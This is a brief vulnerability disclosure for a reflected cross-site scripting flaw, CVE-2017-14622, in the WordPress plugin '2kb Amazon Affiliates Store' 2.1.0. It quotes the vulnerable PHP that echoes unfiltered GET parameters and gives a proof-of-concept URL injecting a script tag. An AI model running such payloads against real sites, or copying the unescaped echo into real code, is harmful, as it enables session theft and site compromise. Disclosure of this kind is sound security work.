0

2kb Amazon Affiliates Store (XSS) CVE-2017-14622

Cross-site scripting located in the plugin “2kb Amazon Affiliates Store” version 2.1.0 of wordpress (https://es.wordpress.org/plugins/2kb-amazon-affiliates-store/).

The absence of a correct filtering in the variables “page” and “kbAction” allows code injection using the GET method.

<input type="hidden" name="page" value="<?php echo $_GET['page'];?>"/>
<input type="hidden" name="kbAction" value="<?php echo $_GET['kbAction'];?>"/>

Example of injection:

http://localhost/wordpress/wp-admin/admin.php?page=kbAmz&kbAction=demo”><script>alert(1234)</script>

adm1n

Leave a Reply

Your email address will not be published. Required fields are marked *